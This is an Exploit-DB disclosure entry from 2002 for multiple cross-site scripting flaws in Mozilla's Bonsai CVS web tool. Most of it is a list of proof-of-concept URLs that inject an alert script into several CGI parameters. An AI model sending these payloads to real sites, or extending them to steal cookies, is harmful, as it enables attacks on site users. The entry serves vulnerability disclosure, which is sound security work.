Mozilla Bonsai Multiple Cross-Site Scripting Vulnerabilities

2002-08-20T00:00:00
ID EDB-ID:21729
Type exploitdb
Reporter Stan Bubrouski
Modified 2002-08-20T00:00:00

Description

Mozilla Bonsai Multiple Cross Site Scripting Vulnerabilities. CVE-2003-0154. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/5516/info

Multiple cross site scripting vulnerabilities have been reported for the Bonsai tool. 

An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Attacker-supplied code may execute within the context of the site hosting the vulnerable software when the malicious link is visited.

This type of vulnerability may be used to steal cookies or perform other web-based attacks. It may be possible to take actions as an user of the Bonsai system.

/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
/cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>
&date=<script>alert(document.domain)</script>
/cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=
&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
/showcheckins.cgi?person=<script>alert(document.domain)</script>
/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD